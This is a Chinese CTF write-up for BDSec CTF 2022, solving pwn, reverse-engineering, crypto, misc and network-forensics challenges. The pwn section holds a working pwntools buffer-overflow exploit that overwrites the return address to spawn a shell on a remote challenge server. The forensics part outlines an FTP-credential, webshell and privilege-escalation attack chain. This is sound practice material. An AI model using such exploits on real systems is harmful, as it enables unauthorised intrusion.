[BDSec CTF 2022] 部分WP
2024-05-20 09:56:40
组队参加了个国外的小线上赛,题目比较简单
目录
PWN
pwnrace
Reverse
BDSec License Checker 0x1
shashdot
Flag Box
Simple Math
Poster
BDSec License Checker 0x03
BDSec License Checker 0x02
Cryptography
CryptoCode
VIPx01
VIPx02
Fake
Dominoes
Loop Lover
Basically RSA
MISC
Message of Hufflepuff
Find Me Inside
NetWorking
PWN
pwnrace
pwn只有一道题是个ret2system ,gets读数据到栈内,导致溢出,并且没有开canary和PIE直接溢出将shell写到ret里
int heath_check()
{char s1[256]; // [rsp+0h] [rbp-100h] BYREFprintf("\x1B[0;32mEnter Password:\n\x1B[0m");gets(s1);if ( strcmp(s1, "hAcK_Th3_Pl@n3t") ){printf("\x1B[41mWrong Password!!!!\n\x1B[0m");_exit(0);}printf("\x1B[4;32mEnter Password:\n\x1B[0m");return system("top -b -n 1");
}
int shell()
{return system("/bin/sh");
}但有个小问题,直接写shell地址不行,需要跳过rbp从lea rax /bin/sh开始
.text:00000000004013A0 ; int shell()
.text:00000000004013A0 public shell
.text:00000000004013A0 shell proc near
.text:00000000004013A0 ; __unwind {
.text:00000000004013A0 F3 0F 1E FA endbr64
.text:00000000004013A4 55 push rbp
.text:00000000004013A5 48 89 E5 mov rbp, rsp
.text:00000000004013A8 48 8D 05 86 13 00 00 lea rax, command ; "/bin/sh"
.text:00000000004013AF 48 89 C7 mov rdi, rax ; command
.text:00000000004013B2 E8 29 FD FF FF call _system
.text:00000000004013B2
.text:00000000004013B7 90 nop
.text:00000000004013B8 5D pop rbp
.text:00000000004013B9 C3 retn
.text:00000000004013B9 ; } // starts at 4013A0
.text:00000000004013B9
.text:00000000004013B9 shell endp完整WP
from pwn import *context(arch='amd64', log_level='debug')elf = ELF('./pwnrace')#p = process('./pwnrace')
p = remote('159.223.101.241', 31337)#gdb.attach(p, 'b*0x401400')
#pause()
sleep(0.2)
p.sendlineafter(b'Password', b"hAcK_Th3_Pl@n3t".ljust(0x108, b'\x00')+ p64(0x4013a8))
p.sendline(b'cat flag')
p.interactive()
#BDSEC{pwn_is_the_way_to_haven}
Reverse
BDSec License Checker 0x1
主程序调用ns_1然后直接比较
int __fastcall ns_2(const char *a1)
{int v2; // [rsp+14h] [rbp-ACh]int i; // [rsp+18h] [rbp-A8h]int v4[34]; // [rsp+20h] [rbp-A0h]unsigned __int64 v5; // [rsp+A8h] [rbp-18h]v5 = __readfsqword(0x28u);if ( strlen(a1) > 0x1F || strlen(a1) <= 0x1E )return puts("Invalid license key. Please try again.");// 长度0x1fv4[0] = 71;v4[1] = 91;v4[2] = 43;v4[3] = 101;v4[4] = 81;v4[5] = 326;v4[6] = 806;v4[7] = 99;v4[8] = 104;v4[9] = 20;v4[10] = 16;v4[11] = 40;v4[12] = 20;v4[13] = 64;v4[14] = 104;v4[15] = 406;v4[16] = 20;v4[17] = 104;v4[18] = 706;v4[19] = 20;v4[20] = 416;v4[21] = 64;v4[22] = 89;v4[23] = 26;v4[24] = 99;v4[25] = 64;v4[26] = 10;v4[27] = 89;v4[28] = 10;v4[29] = 10;v4[30] = 526;v2 = 0;for ( i = 0; i < strlen(a1); ++i ){if ( (unsigned int)ns_1((unsigned int)a1[i]) + 5 != v4[i] ){v2 = 0;break;}v2 = 1;}if ( v2 == 1 )return puts("Congrats ! You found the right license key.");elsereturn puts("Invalid license key. Please try again.");
}
__int64 __fastcall ns_1(int a1)
{unsigned int v3; // [rsp+Ch] [rbp-8h]v3 = 0;while ( a1 ){v3 = 10 * v3 + a1 % 10;a1 /= 10;}return v3;
}WP
c =[71,91,43,101,81,326,806,99,104,20,16,40,20,64,104,406,20,104,706,20,416,64,89,26,99,64,10,89,10,10,526]def ns_1(a1):v3 = 0;while a1 != 0:v3 = 10 * v3 + (a1 % 10);a1 //= 10;return v3;flag = ''
for i in c:for j in range(0x21, 0x7f):if (ns_1(j) + 5) == i:flag+=chr(j)break print(flag)
#BDSEC{l1c3n53_ch3ck3r_0x1_2022} shashdot
提示是patch me if you can! 其实不用patch只是加密逻辑不在main里,直接找到即可,s里是65再对应加上v3
unsigned __int64 rrqqq()
{int i; // [rsp+Ch] [rbp-44h]char s[32]; // [rsp+10h] [rbp-40h] BYREFchar v3[19]; // [rsp+30h] [rbp-20h]char v4[2]; // [rsp+43h] [rbp-Dh] BYREFunsigned __int64 v5; // [rsp+48h] [rbp-8h]v5 = __readfsqword(0x28u);v3[0] = 1;v3[1] = 3;v3[2] = 18;v3[3] = 4;v3[4] = 2;v3[5] = 58;v3[6] = 40;v3[7] = 30;v3[8] = -1;v3[9] = 12;v3[10] = 30;v3[11] = -1;v3[12] = 30;v3[13] = 17;v3[14] = 4;v3[15] = 30;v3[16] = 45;v3[17] = -17;v3[18] = -17;qmemcpy(v4, "!<", sizeof(v4));memset(s, 65, 0x15uLL);for ( i = 0; i <= 20; ++i )s[i] += v3[i];puts(s);return v5 - __readfsqword(0x28u);
}WP
#rrqqq()
c = [1,3,18,4,2,58,40,30,-1,12,30,-1,30,17,4,30,45,-17,-17, 33,60]
print(bytes([v+65 for v in c]))
#BDSEC{i_@M_@_RE_n00b}Flag Box
这个同上个基本一样,主逻辑在ox里,先给出串然后按指定顺序输出
qmemcpy(v28, "dyb}_0SBhCgtUarDiEH{u", sizeof(v28));v0 = std::operator<<<std::char_traits<char>>(&std::cout, 66LL);v1 = std::operator<<<std::char_traits<char>>(v0, (unsigned int)v28[15]);v2 = std::operator<<<std::char_traits<char>>(v1, (unsigned int)v28[6]);v3 = std::operator<<<std::char_traits<char>>(v2, (unsigned int)v28[17]);v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v28[9]);v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v28[19]);v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v28[18]);v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v28[20]);v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v28[14]);v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v28[14]);v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v28[13]);v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v28[8]);v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v28[4]);v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v28[12]);v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v28[4]);v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v28[10]);v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v28[5]);v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v28[11]);v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v28[4]);v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v28[16]);v20 = std::operator<<<std::char_traits<char>>(v19, (unsigned int)v28[11]);v21 = std::operator<<<std::char_traits<char>>(v20, (unsigned int)v28[4]);v22 = std::operator<<<std::char_traits<char>>(v21, (unsigned int)v28[2]);v23 = std::operator<<<std::char_traits<char>>(v22, (unsigned int)v28[20]);v24 = std::operator<<<std::char_traits<char>>(v23, (unsigned int)v28[0]);v25 = std::operator<<<std::char_traits<char>>(v24, (unsigned int)v28[0]);v26 = std::operator<<<std::char_traits<char>>(v25, (unsigned int)v28[1]);std::operator<<<std::char_traits<char>>(v26, (unsigned int)v28[3]);return 0LL;WP
#ox()
c = "dyb}_0SBhCgtUarDiEH{u"
a = [15,6,17,9,19,18,20,14,14,13,8,4,12,4,10,5,11,4,16,11,4,2,20,0,0,1,3]
flag = 'B'
for i in a:flag+=c[i]print(flag)
#BDSEC{Hurrah_U_g0t_it_buddy}Simple Math
真以为重了,同上
qmemcpy(v21, "_YDPCSeEBzZ3aA{}", sizeof(v21));std::operator<<<std::char_traits<char>>(&std::cout,"\nThat was easy right?\n\nBy the way,\nHere is your flag:\n\n",a3);v3 = std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v21[8]);v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v21[2]);v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v21[5]);v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v21[7]);v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v21[4]);v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v21[14]);v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v21[11]);v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v21[12]);v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v21[10]);v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v21[1]);v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v21[0]);v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v21[3]);v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v21[6]);v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v21[13]);v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v21[9]);v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v21[1]);v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v21[15]);std::ostream::operator<<(v19, &std::endl<char,std::char_traits<char>>);return 0LL;#fg()
c = "_YDPCSeEBzZ3aA{}"
a = [8,2,5,7,4,14,11,12,10,1,0,3,6,13,9,1,15]
flag = ''
for i in a:flag+=c[i]print(flag)
#BDSEC{3aZY_PeAzY}Poster
这个输入以后直接比较,
printf("Flag? ");fgets(v8, 73, stdin);v3 = strlen(v8);v4 = 0LL;v5 = v3 - 1;do{if ( v5 == v4 ){puts("Congratulations password iss your flag");return 0;}v6 = v8[v4++];}while ( v6 == LOBYTE(flag[v4 - 1]) );.rodata:0000000000002960 42 00 44 00 45 00 43 00 7B 00+text "UTF-16LE", 'BDEC{this_Start_your_re_journey}'BDSec License Checker 0x03
看上去很复杂,但仔细理一下,就是把大小写分开作个循环移位然后反向一次
int __cdecl main(int argc, const char **argv, const char **envp)
{char v4; // [rsp+5h] [rbp-13Bh]char v5; // [rsp+5h] [rbp-13Bh]char v6; // [rsp+5h] [rbp-13Bh]int j; // [rsp+8h] [rbp-138h]int k; // [rsp+8h] [rbp-138h]int m; // [rsp+8h] [rbp-138h]int v10; // [rsp+Ch] [rbp-134h]int i; // [rsp+10h] [rbp-130h]int v12; // [rsp+14h] [rbp-12Ch]char v13; // [rsp+1Ch] [rbp-124h]int v14[40]; // [rsp+20h] [rbp-120h]char s[104]; // [rsp+C0h] [rbp-80h] BYREFunsigned __int64 v16; // [rsp+128h] [rbp-18h]v16 = __readfsqword(0x28u);v10 = 0;v14[0] = 125;v14[1] = 120;v14[2] = 84;v14[3] = 110;v14[4] = 83;v14[5] = 119;v14[6] = 95;v14[7] = 84;v14[8] = 84;v14[9] = 109;v14[10] = 87;v14[11] = 111;v14[12] = 95;v14[13] = 109;v14[14] = 84;v14[15] = -128;v14[16] = 82;v14[17] = 122;v14[18] = 87;v14[19] = 120;v14[20] = 95;v14[21] = 84;v14[22] = 110;v14[23] = 105;v14[24] = 84;v14[25] = 120;v14[26] = 88;v14[27] = -127;v14[28] = 95;v14[29] = 110;v14[30] = 73;v14[31] = 100;v14[32] = 123;v14[33] = 82;v14[34] = 84;v14[35] = 72;v14[36] = 83;v14[37] = 81;puts("\t----------------------------");puts("\t BDSEC License Checker 0x03");puts("\t----------------------------\n");printf("Please enter your license to continue : ");gets(s, argv);if ( strlen(s) == 38 ){for ( i = 0; i < strlen(s); ++i ){if ( s[i] <= 64 || s[i] > 90 ){if ( s[i] > 96 && s[i] <= 122 ){if ( s[i] <= 96 || s[i] > 109 ) // 小写字母ROT13s[i] -= 13;elses[i] += 13;}}else if ( s[i] <= 63 || s[i] > 77 ){ // 大写s[i] -= 13;}else{s[i] += 13;}}v12 = strlen(s);for ( j = 0; j < v12 / 2; ++j ) // 反向{v13 = s[j];s[j] = s[v12 - j - 1];s[v12 - j - 1] = v13;}for ( k = 0; s[k]; ++k ){v4 = s[k];if ( v4 <= 96 || v4 > 122 ){if ( v4 > 64 && v4 <= 90 ){ // 大写右移2位v6 = v4 + 2;if ( v6 > 90 )v6 -= 26;s[k] = v6;}}else{v5 = v4 + 8; // 小写右移8位if ( v5 > 122 )v5 -= 26;s[k] = v5;}}for ( m = 0; m < strlen(s); ++m ){if ( s[m] != v14[m] ){v10 = 0;break;}v10 = 1;}if ( v10 == 1 )puts("Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point""s by submitting the license key.");elseputs("Invalid license key. Please try again.");}else{puts("Invalid license key. Please try again.");}return 0;
}但这有个小坑点:对比串里有-128和-127这两个数逆不回来,所以这两个字母是根据单词猜的
c = [125,120,84,110,83,119,95,84,84,109,87,111,95,109,84,128,82,122,87,120,95,84,110,105,84,120,88,129,95,110,73,100,123,82,84,72,83,81]
flag = ''
for i in c:if i>=ord('A') and i<=ord('Z'):i -=2if i<ord('A'):i+=26 elif i>=ord('a') and i<=ord('z'):i -=8if i<ord('a'):i+=26if i>=ord('A') and i<=ord('Z'):if i<ord('A')+13:i+=13else:i-=13 elif i>=ord('a') and i<=ord('z'):if i<ord('a')+13:i+=13else:i-=13 flag+=chr(i)
print(flag[::-1])
#BDSEC{iTs_IcEnsE_cHeCEr_tHrEE_bDsEc} 猜两个词
#BDSEC{iTs_lIcEnsE_cHeCkEr_tHrEE_bDsEc}BDSec License Checker 0x02
这个是先出的,但是分值高排后边了
跟3相似,只是没有反向,可以直接爆破,不需要理解
v10 = 65;v9 = 63;v11 = 0;v5[0] = 109;v5[1] = 111;v5[2] = 126;v5[3] = 112;v5[4] = 110;v5[5] = 128;v5[6] = 119;v5[7] = 116;v5[8] = 110;v5[9] = 112;v5[10] = 121;v5[11] = 58;v5[12] = 56;v5[13] = 100;v5[14] = 110;v5[15] = 115;v5[16] = 112;v5[17] = 110;v5[18] = 118;v5[19] = 56;v5[20] = 125;v5[21] = 100;v5[22] = 53;v5[23] = 105;v5[24] = 53;v5[25] = 55;v5[26] = 100;v5[27] = 55;v5[28] = 53;v5[29] = 55;v5[30] = 55;v5[31] = 100;v5[32] = 121;v5[33] = 58;v5[34] = 130;puts("\t----------------------------");puts("\t BDSEC License Checker 0x02");puts("\t----------------------------\n");printf("Please enter your license to continue : ");gets(s, argv);if ( strlen(s) == 35 ){for ( i = 0; s[i]; ++i ){if ( s[i] > 96 && s[i] <= 122 )s[i] -= 32;}for ( i = 0; s[i]; ++i ){if ( s[i] > 64 && s[i] <= 90 )s[i] += 32;}for ( i = 0; s[i]; ++i ){v13 = s[i];if ( v13 <= 96 || v13 > 122 ){if ( v13 > 64 && v13 <= 90 ){v7 = v9 % 10;v13 += v9 % 10;if ( v13 > 90 )v13 -= 26;s[i] = v13;}}else{v7 = v10 % 10;v13 += v10 % 10;if ( v13 > 122 )v13 -= 26;s[i] = v13;}}for ( i = 0; s[i]; ++i ){v13 = s[i];if ( v13 <= 96 || v13 > 122 ){if ( v13 > 64 && v13 <= 90 ){v7 = v9 % 4;v13 += v9 % 4;if ( v13 > 90 )v13 -= 26;s[i] = v13;}}else{v7 = v10 % 4;v13 += v10 % 4;if ( v13 > 122 )v13 -= 26;s[i] = v13;}}for ( i = 0; ; ++i ){v3 = i;if ( v3 >= strlen(s) )break;v8 = s[i];if ( v5[i] != v8 + 5 ){v11 = 0;break;}v11 = 1;}if ( v11 == 1 )puts("Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point""s by submitting the license key.");elseputs("Invalid license key. Please try again.");}else{puts("Invalid license key. Please try again.");}return 0;原文翻译爆破即可
c =[109,111,126,112,110,128,119,116,110,112,121,58,56,100,110,115,112,110,118,56,125,100,53,105,53,55,100,55,53,55,55,100,121,58,130]v9 = 63
v10 = 65
flag = ''
for i in range(35):for jj in range(0x21,0x7f):j = jj if j>96 and j<=122:j -=32if j>64 and j<=90:j +=32tj = j if tj<=96 or tj> 122:if tj>64 and tj <=90:tj += v9 %10 if tj > 90:tj -=26 j = tj else: tj += v10 % 10 if tj > 122:tj -=26j = tj tj = j if tj <=96 or tj>122:if tj >64 and tj <=90:tj += v9 %4 if tj >90 :tj -=26j = tj else:tj += v10%4 if tj > 122:tj -=26j = tj if j+5 == c[i]:flag += chr(jj)breakprint(flag)
#BDSEC{LICEN53_CHECK3R_0X02_2022_N5}Cryptography
CryptoCode
给的密文cipher.txt,提示:I convert plain text to cipher text by using Cryptocode library . Always Remember BDSEC is a KEY . 这个看了提示就明白了用cryptocode库
c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg==import cryptocode
myDecryptedMessage = cryptocode.decrypt("c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg==", "BDSEC")
print(myDecryptedMessage)
#BDSEC{cryp70_and_pyth0n_ar3_aw3s0me}VIPx01
题目:
My friend gave me his game username and game id . Can decode game id ?User : rotGame ID : OQFRP{pelcg0_ne3_nj3f0z3}这个是ROT13
BDSEC{crypt0_ar3_aw3s0m3}VIPx02
这个没弄出来,分数很低但确实没作出来,也许是非常简单的加密方法,但确实想不出是哪个
My friend gave me his VIP account credential and he said to me decode my password .User : twin13password : 3ip2uq3mj5z95oj59s4q654j4q65hv5746oj4o64pz5644pz18f1bm5tx4v35z95oj59s6w0Fake
一大篇文章
Dear E-Commerce professional ; This letter was specially
selected to be sent to you . This is a one time mailing
there is no need to request removal if you won't want
any more . This mail is being sent in compliance with
Senate bill 1624 , Title 1 , Section 302 ! This is
not a get rich scheme ! Why work for somebody else
when you can become rich as few as 60 WEEKS . Have
you ever noticed how long the line-ups are at bank
machines plus how long the line-ups are at bank machines
! Well, now is your chance to capitalize on this .
We will help you use credit cards on your website plus
increase customer response by 140% ! You can begin
at absolutely no cost to you ! But don't believe us
! Prof Jones who resides in Massachusetts tried us
and says "Now I'm rich, Rich, RICH" . This offer is
100% legal ! We IMPLORE you - act now . Sign up a friend
and you get half off ! God Bless . Dear Internet user
; This letter was specially selected to be sent to
you . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail . This mail is being sent
in compliance with Senate bill 2016 , Title 9 , Section
302 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
within 92 days . Have you ever noticed society seems
to be moving faster and faster plus nobody is getting
any younger . Well, now is your chance to capitalize
on this . WE will help YOU use credit cards on your
website & decrease perceived waiting time by 140% .
You can begin at absolutely no cost to you ! But don't
believe us ! Ms Ames who resides in Alaska tried us
and says "I was skeptical but it worked for me" . We
are a BBB member in good standing . Do not delay -
order today . Sign up a friend and you get half off
. Thank-you for your serious consideration of our offer
! Dear Business person ; This letter was specially
selected to be sent to you . If you no longer wish
to receive our publications simply reply with a Subject:
of "REMOVE" and you will immediately be removed from
our directory . This mail is being sent in compliance
with Senate bill 2416 , Title 1 , Section 304 . Do
NOT confuse us with Internet scam artists . Why work
for somebody else when you can become rich within 30
DAYS . Have you ever noticed nobody is getting any
younger and nearly every commercial on television has
a .com on in it . Well, now is your chance to capitalize
on this . WE will help YOU process your orders within
seconds plus process your orders within seconds ! You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson who resides in
Alabama tried us and says "My only problem now is where
to park all my cars" ! We are licensed to operate in
all states . We BESEECH you - act now ! Sign up a friend
and your friend will be rich too ! God Bless . Dear
Business person , Thank-you for your interest in our
publication ! We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 2416 , Title 1 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING . Why work for somebody else when you can
become rich within 10 WEEKS ! Have you ever noticed
more people than ever are surfing the web and people
love convenience . Well, now is your chance to capitalize
on this ! We will help you process your orders within
seconds and deliver goods right to the customer's doorstep
. You are guaranteed to succeed because we take all
the risk . But don't believe us . Mr Simpson of Georgia
tried us and says "I've been poor and I've been rich
- rich is better" ! We are a BBB member in good standing
! We urge you to contact us today for your own future
financial well-being ! Sign up a friend and you get
half off . Thanks . Dear Sir or Madam ; You made the
right decision when you signed up for our mailing list
! This is a one time mailing there is no need to request
removal if you won't want any more ! This mail is being
sent in compliance with Senate bill 2216 ; Title 2
; Section 307 ! This is a ligitimate business proposal
! Why work for somebody else when you can become rich
as few as 24 months . Have you ever noticed people
will do almost anything to avoid mailing their bills
plus nobody is getting any younger . Well, now is your
chance to capitalize on this . We will help you increase
customer response by 120% & increase customer response
by 150% . You can begin at absolutely no cost to you
! But don't believe us ! Mrs Anderson who resides in
New York tried us and says "I was skeptical but it
worked for me" . We are licensed to operate in all
states ! So make yourself rich now by ordering immediately
. Sign up a friend and you'll get a discount of 90%
. Best regards . Dear Cybercitizen , Especially for
you - this red-hot announcement ! We will comply with
all removal requests ! This mail is being sent in compliance
with Senate bill 1621 ; Title 4 ; Section 302 ! This
is NOT unsolicited bulk mail . Why work for somebody
else when you can become rich within 78 days ! Have
you ever noticed nobody is getting any younger & most
everyone has a cellphone ! Well, now is your chance
to capitalize on this . WE will help YOU SELL MORE
plus turn your business into an E-BUSINESS ! You can
begin at absolutely no cost to you ! But don't believe
us ! Mrs Jones who resides in North Dakota tried us
and says "My only problem now is where to park all
my cars" . We are a BBB member in good standing . We
beseech you - act now ! Sign up a friend and you'll
get a discount of 10% . Thank-you for your serious
consideration of our offer . Dear Friend , Your email
address has been submitted to us indicating your interest
in our publication ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 1623 , Title 7 , Section 303 . THIS IS
NOT A GET RICH SCHEME . Why work for somebody else
when you can become rich inside 58 MONTHS . Have you
ever noticed nobody is getting any younger plus nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU process your orders within seconds
& decrease perceived waiting time by 140% ! You can
begin at absolutely no cost to you ! But don't believe
us . Ms Simpson of New Hampshire tried us and says
"Now I'm rich many more things are possible" . This
offer is 100% legal ! Do not delay - order today .
Sign up a friend and you'll get a discount of 10% .
Thank-you for your serious consideration of our offer
! Dear Colleague ; Your email address has been submitted
to us indicating your interest in our newsletter !
If you no longer wish to receive our publications simply
reply with a Subject: of "REMOVE" and you will immediately
be removed from our mailing list . This mail is being
sent in compliance with Senate bill 1619 , Title 9
; Section 304 ! This is NOT unsolicited bulk mail .
Why work for somebody else when you can become rich
as few as 82 months . Have you ever noticed the baby
boomers are more demanding than their parents plus
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! We will help
you turn your business into an E-BUSINESS & use credit
cards on your website . You can begin at absolutely
no cost to you . But don't believe us ! Prof Ames of
Michigan tried us and says "I was skeptical but it
worked for me" ! We assure you that we operate within
all applicable laws . For the sake of your family order
now . Sign up a friend and your friend will be rich
too . Cheers ! Dear Internet user , Especially for
you - this hot announcement . We will comply with all
removal requests . This mail is being sent in compliance
with Senate bill 1623 ; Title 6 , Section 309 . This
is NOT unsolicited bulk mail . Why work for somebody
else when you can become rich inside 11 weeks ! Have
you ever noticed people will do almost anything to
avoid mailing their bills plus how long the line-ups
are at bank machines ! Well, now is your chance to
capitalize on this . WE will help YOU deliver goods
right to the customer's doorstep and use credit cards
on your website . You are guaranteed to succeed because
we take all the risk . But don't believe us . Mrs Jones
of Illinois tried us and says "I've been poor and I've
been rich - rich is better" . We assure you that we
operate within all applicable laws . We BESEECH you
- act now ! Sign up a friend and your friend will be
rich too ! Warmest regards . Dear Professional ; Your
email address has been submitted to us indicating your
interest in our briefing ! If you no longer wish to
receive our publications simply reply with a Subject:
of "REMOVE" and you will immediately be removed from
our mailing list . This mail is being sent in compliance
with Senate bill 1623 ; Title 6 ; Section 302 ! This
is not multi-level marketing ! Why work for somebody
else when you can become rich in 99 weeks ! Have you
ever noticed people love convenience and nearly every
commercial on television has a .com on in it ! Well,
now is your chance to capitalize on this ! We will
help you sell more plus deliver goods right to the
customer's doorstep . You can begin at absolutely no
cost to you . But don't believe us ! Prof Ames of South
Carolina tried us and says "My only problem now is
where to park all my cars" . We are licensed to operate
in all states . You have no reason not to act now .
Sign up a friend and you get half off ! Thanks . Dear
Salaryman ; Especially for you - this hot announcement
! If you are not interested in our publications and
wish to be removed from our lists, simply do NOT respond
and ignore this mail ! This mail is being sent in compliance
with Senate bill 1621 , Title 1 , Section 306 . Do
NOT confuse us with Internet scam artists . Why work
for somebody else when you can become rich in 46 days
! Have you ever noticed more people than ever are surfing
the web plus people love convenience ! Well, now is
your chance to capitalize on this ! WE will help YOU
deliver goods right to the customer's doorstep and
process your orders within seconds . You can begin
at absolutely no cost to you ! But don't believe us
. Mr Ames of Virginia tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. You will blame yourself forever if you don't order
now . Sign up a friend and you'll get a discount of
10% ! Thanks . 在网站上解码
网站:https://spammimic.com/decode.cgi
结果:Hello Mr.Alex I won't 100000 M USD dolor. Can you want that, you need this key BDSEC{do3sn't_b3li3ve_1n_unkn0wn_mail} Dominoes
密文没法写,就是用y作了个加密
#! /usr/bin/python3def x(a, b):h = ""for i in range(len(a), len(b)):t.push(y(b[i]))return "".join(a)def y(c):a = list(c)for i in range(len(c)):b = c[i]for j in range(i + 1, len(c)):b = chr(ord(b) ^ ord(c[j])) a[i] = breturn "".join(a)def z():flag = open("flag.txt", "r").read()enc_flag = y(flag)f = open("encrypted.txt", "w")f.write(enc_flag)f.close()if __name__ == "__main__":z()
逐个用后边的字符异或,逆向时从后向前作
enc = open("encrypted.txt", "rb").read()
a = [0]*len(enc)
for i in range(len(enc)-1, -1, -1):b = enc[i]for j in range(i+1, len(enc)):b ^= a[j]a[i] = bprint(bytes(a))
#BDSEC{n0t_50_e45y_hUh?_433}Loop Lover
密文:kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9
算法:
def f(t):c = list(t)for i in range(len(t)):for j in range(i, len(t) - 1):for k in range(j, len(t) - 2):c[k], c[k+1] = c[k+1], c[k]return "".join(c)if __name__ == "__main__":flag = open("flag.txt", "r").read()open("ciphertext.txt", "w").write(f(flag))
解法,原程序本向就是个交换位置,只需要弄个同长的串正向得到位置然后找回来即可
def f(t):c = list(t)for i in range(len(t)):for j in range(i, len(t) - 1):for k in range(j, len(t) - 2):c[k], c[k+1] = c[k+1], c[k]return "".join(c)flag = '0123456789abcdefghijklmnopqrstuv'
print(f(flag))ttt = '15dtu9cb80gi6sqhnolmf7rke4ja32pv'
c = 'kU1HlnN1aQMBNNRDzX20M73X9RwUTRz9'
d = ''
for i in range(32):d += c[ttt.index(flag[i])]from base64 import *
print(b64decode(d))#BDSEC{ju57_L00p_m3_4w4y}
Basically RSA
唯一的一个rsa题,n很小可分解
#N: 1280678415822214057864524798453297819181910621573945477544758171055968245116423923#E: 65537#C: 241757357533719849989659127349827982677055294256023833052829147857534659015212862p = 1899107986527483535344517113948531328331
q = 674357869540600933870145899564746495319033
n = 1280678415822214057864524798453297819181910621573945477544758171055968245116423923
e = 65537
c = 241757357533719849989659127349827982677055294256023833052829147857534659015212862from gmpy2 import *
from Crypto.Util.number import long_to_bytes
phi_n = (p-1)*(q-1)
d = invert(e, phi_n)
m = pow(c, d, n)
print(long_to_bytes(m))
#BDSEC{r54_i5_fUn_r16h7?}MISC
Message of Hufflepuff
哈夫曼编码
密文按编码从头对照,手工处理即可
00101 B
111 D
00110 S
1011 E
1001 C
00111 {
00010 H
01000 u
1000 f
1000 f
00100 m
01011 @
1101 n
1100 _
1011 E
1101 n
00001 c
01100 0
01001 d
01101 1
1101 n
1010 g
1100 _
1010 g
01010 o
01110 7
1100 _
111 D
01111 3
1001 C
00011 O
111 D
01111 3
111 D
00000 }BDSEC{Huffm@n_Enc0d1ng_go7_D3COD3D}Find Me Inside
下来一个图片
用binwalk解出数据
Sld xlfow R yv hl olhg
Rm z kozxv R pmld hl dvoo?
Sld xlfow R yv hl yilpvm
Rm z uznrob hl gltvgsvi?
Sld xlfow R yv hl olmvob
Hfiilfmwvw yb hl nzmb?
Sld xlfow R yv hl fmszkkb
Hfiilfmwvw yb hl nfxs yvzfgb?
Sld xlfow R yv nv
Dsvm vevm R ivnzrm z nbhgvib?
YWHVX{N33n_gsv_yfggviuob_tlvh_fk_fk_zmw_zdzb}这个基本就是词频的事了,放到 quipquip.com 上查得到
BDSEC{M33m_the_butterfly_goes_up_up_and_away}NetWorking
这个题有20问,过关形式,过到十几就没走下去
这是一个网络测试攻击抓的包,先是用arp探测然后探测网站,试ftp密码,成功后下载文件,用webshell在网站起9001端口,登入后下载poc程序提权。
-------Victim & Attacker
25
NSTechvally is an multinational hosting & cloud service providing company. Recently we have detected some unusal activity to the server. An attacker got access to our server. And we recently found out that the developer did some mistakes developing our website. We have captured the network traffic. Help us to find out how the attacker compromised our server.Attachmentscapture.pcapng
N.B: This is the challenge file for all the networking challenges.
What is the server ip & the attacker ip? 攻击和服务器的IPFlag Format: BDSEC{0.0.0.0_127.0.0.1}BDSEC{192.168.1.13_192.168.1.10} ------Which FTP?
50
What ftp & version the server is using? ftp程序的版本号Flag Format : BDSEC{ftp_0.0.0}BDSEC{vsFTPd_3.0.3}-----FTP Creads
50
What is the ftp username & password? ftp用户名和密码Flag Format : BDSEC{username_password}
BDSEC{ftpadmin_ftpadmin}----Uploaded File
50
What file did the attacker uploaded to the ftp server? [with location]上传的文件
Flag Format : BDSEC{/location/file_name}
BDSEC{/files/.hacker.note}----Log File
50
What is the log file name? 日志文件叫啥Flag Format : BDSEC{something.log}
BDSEC{vsftpd.log}----Project Incharge
50
